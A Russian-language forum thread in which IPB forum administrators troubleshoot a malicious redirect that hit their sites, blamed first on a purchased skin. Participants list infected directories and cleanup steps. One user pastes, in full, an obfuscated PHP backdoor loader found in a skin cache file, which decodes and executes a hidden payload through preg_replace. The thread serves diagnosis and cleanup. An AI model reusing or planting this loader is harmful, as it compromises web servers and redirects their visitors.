Вирус в Skin от Evanescence

[AlexAuto 1]

решил сделать тему так как хочу уберечь других от покупки скина у Evanescence от IBSkin.xxx

купил у них скин 18 числа и сразу установил, 19 числа посещаемость упала в двое, 23 числа пользователь написал что его антивирус матерится на форум RedirDL-inf [Trj], 25 числа начал сам искать вирус, просиходит редирект на сайт xxxx://url4short.info/692f6991 при переходе с поисковиков на форум. перерыл весь движок, поменял все файлы движка, не чего не дало, в итоге попросил специалистов, несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли. посещаемость упала с 60000 до 10000, не кто не смог помочь в поисках проблемы, в итоге сегодня разобрались что все тянется со скриптов скина, скин удалили кеш почистили и все стало четко,

[siv1987 2628]

Это довольно серьезное обвинение, и нужны более весомые доказательства чем "у меня на форуме нашелся вирус". Далеко не факт, что вирус поставлялся вместе с шаблонам. Вы открывали дистрибутив скина, нашли в нем злополучный скрипт? Если версия форума та, что указана в профиле, то у меня для вас "хорошие" новости... Вы в курсе событий про выходы последних патчей безопасности?

 

60К хостов в день?? Это таки немалая посещаемость,

несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли.

Такие редиректы как правило палятся очень лекго, и искать там особо нечего. Выявляется тип редиректа - серверный или жс и, исходя из типа, проводятся поиски начиная с местах где чаще всего его прописывают.

[AlexAuto 1]

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)

версия IPB последняя, про безопастность вкурсе,

[Ritsuka 540]

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

 

Выложите куда-нибудь и скиньте в личку ссылку на дистрибутив скина - и мне будет интересно поискать, и вам будет полезно, если окажется, что проблема все же не в скине.

[Fisana 700]

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

Это не причина не доверять.

В 2008 (да и в 2009 вроде) при регистрации еще не требовалось вписывать Board URL.

 

А еще раньше версию форума тоже не надо было указывать

[siv1987 2628]

да конечно, скрипт подгружаемый по куки с другого сервера

Скрипт где был обнаружен, в дистрибутиве или на рабочем форуме? Если на форуме и при этом не был проверен дистрибутив, тут говорить не о чем. То, что вредоносный скрипт оказался в исходном коде это естественно, это же жс скрипт.

 

Это не причина не доверять.

@Fisana, речь не о доверии, а о некомпетентности автора. ТС конкретно так и не указал, есть ли этот вредоносный код в дистрибутиве шаблона или нет. Поэтому здесь сложно доверять его словам.

[Атаман 460]

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе,

 

Это вирус Вашего Форума, а не шаблона. Так, как я сталкивался с этим неоднократно.

 

Простой пример

Знакомый пишет.

У меня через гугл на форум попасть не возможно, переадресовывает на другой форум. Шаблон у него стоял, который использовал красоты. (Смена цвета и тд).

Взял, удалил его, и все пропало, все работает. Думаю что-то не то. Полез на фтп, в основном все файлы, включая конфиг были заражены. Прописан код Eval(6.

А причина была простая, не стоит храниться пароли, в фтп менеджерах, и стоит периодически их менять. Но есть вероятность хостинг. Сообщите им.

Вирусы сидят, в файлах с расширение php, но лучше проверить все.

 

Примеры, где я чистил.

conf_global.php

/cache/skin_cache

/cache/lang_cache

/hooks

/ips_kernel

/public/style_images/ (Ваш шаблон). В моем случае, в папке с шаблонов было много php файлов, и все заражены.

 

Можно ssh поиском, чтобы обнаружить в каких файлах используется этот вредоносный код.

[mizer 1]

Читать: http://forums.odforce.net/index.php?/topic/16575-rss-feeds-link-problem/

 

У меня данная зараза сидела в кеше шаблона cache/skin_cache/что-то_там_1/skin_global.php (по памяти). В середине файла идет код инклуда JS (легче сделать поиск по переменной $mds )

 

Последний патч устраняет дыру.

 

Я не специалист, но по моему, также перестройка кеша удалит все.

Изменено 5 января 2013 пользователем mizer

[Jet 0]

Да, бяда. Такая же проблема. Появилась еще в декабре. Редирект на вышеуказанный сайт. Думал что почистил, но сейчас проверил, редирект снова стал проявляться. Вот вишь засада, и как его вынести полностью? Может кто напишет подробно как с сей напастью бороться, искать зараженные файлы?

[siv1987 2628]

Искать шеллы.

Сменить пароли (бд, можно фтп).

Читать соответствующие топики на форуме где эта тема обсуждалась уже не один раз.

[Jet 0]

Ну эт понятно. Я рассчитывал больше на подробности, ну ладно, кто ищет собсно, тот найдет. В файле /cache/skin_cache/cacheid_Х/skin_global.php нашел лишнее:

$k='bf05f0304ee14efae6ce9165e0a2c194';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[bs/uBvR(wvzgBgP[bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[bZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

 

Я так понимаю это и есть шелл?

[siv1987 2628]

Да, это и есть одна из его разновидностей. Перестройте кеш, чтобы убедится что код находился только в кеше а не в шаблоне, иначе при перестроении он снова появится.

[Jet 0]

Да, кэш перестроил, код пропал. Пока вродь не редиректит.

[pasha_d 0]

Блин, та же беда. Подскажите плс лоху. Этот код надо найти через админку в файлах и стереть целиком или там есть какие заморочки и лохам лучче не соваца?

С уважением

[georg2030 0]

Точно такая же проблема, уже все файлы на все возможные совпадения проверил, всю базу, вообще все что можно. Убираю код из skin_global.php и через некоторое время он снова перезаписывается :(